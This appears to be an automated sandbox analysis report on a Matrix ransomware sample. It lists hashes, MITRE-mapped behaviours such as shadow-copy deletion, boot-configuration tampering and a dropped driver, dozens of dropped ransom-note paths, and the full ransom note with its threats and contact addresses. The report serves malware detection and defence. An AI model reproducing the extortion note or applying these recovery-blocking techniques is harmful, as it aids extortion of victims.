matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
145s
max time network
136s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
25-07-2024 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Size

1.2MB
MD5

907636b28d162f7110b067a8178fa38c
SHA1

048ae4691fe267e7c8d9eda5361663593747142a
SHA256

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512

501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
SSDEEP

24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Score

10^/10

matrix defense_evasion discovery evasion execution impact persistence ransomware upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\#CORE_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 5ECC57EC62BCE8F5\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 5ECC57EC62BCE8F5\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 w2EbJBpx\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\it-it\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16\Stationery\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nl-nl\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\F4B7C316-9DCD-4384-8B8E-E5DE3752D452\en-us.16\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
8956	bcdedit.exe
7488	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
135	2204	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
7164	powershell.exe
2204	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	eF1cYkHq64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	eF1cYkHq64.exe

Executes dropped EXE 3 IoCs

pid	Process
4920	NWmModN1.exe
7952	eF1cYkHq.exe
5100	eF1cYkHq64.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7496	takeown.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral5/memory/7952-10178-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/files/0x000700000001ac3e-10179.dat	upx
behavioral5/memory/7952-15240-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	eF1cYkHq64.exe
File opened (read-only)	\??\W:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\O:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\M:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\K:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\J:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\G:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\T:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\N:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\E:	eF1cYkHq64.exe
File opened (read-only)	\??\A:	eF1cYkHq64.exe
File opened (read-only)	\??\L:	eF1cYkHq64.exe
